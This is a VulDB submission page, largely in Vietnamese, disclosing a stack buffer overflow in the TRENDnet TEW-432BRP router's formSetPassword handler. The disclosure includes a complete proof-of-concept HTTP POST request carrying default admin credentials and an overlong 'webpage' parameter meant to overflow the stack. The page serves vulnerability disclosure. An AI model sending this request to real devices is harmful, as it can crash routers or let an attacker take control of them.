Gửi #814772: TRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflowthông tin

tiêu đềTRENDnet TEW-432BRP 3.10B20 Stack-based Buffer Overflow
Mô tảIn formSetPassword function, webpage is directly passed by the attacker, If this part of the data is too long, it will cause the stack overflow, so we can control the webpage to execute arbitrary code. POST /goform/formSetPassword HTTP/1.1 Host: 192.168.10.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 870 Origin: http://192.168.10.1 Authorization: Basic YWRtaW46YWRtaW4= Connection: keep-alive Referer: http://192.168.10.1/mgmt_password.asp?t=1777346206269 Upgrade-Insecure-Requests: 1 adm_pwd1=admin&adm_pwd2=admin&user_pwd1=admin&user_pwd2=admin&webpage=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Nguồn⚠️ https://github.com/wudipjq/my_vuln/blob/main/TRENDnet/vuln_15/15.md
Người dùng
 pjq_Buoy (UID 97666)
Đệ trình28/04/2026 09:13 (cách đây 1 tháng)
Kiểm duyệt30/05/2026 09:00 (1 month later)
Trạng tháiđược chấp nhận
Mục VulDB367415 [TRENDnet TEW-432BRP 3.10B20 /goform/formSetPassword webpage tràn bộ đệm]
điểm20

TrướcTổng QuanTiếp theo

Want to know what is going to be exploited?

We predict KEV entries!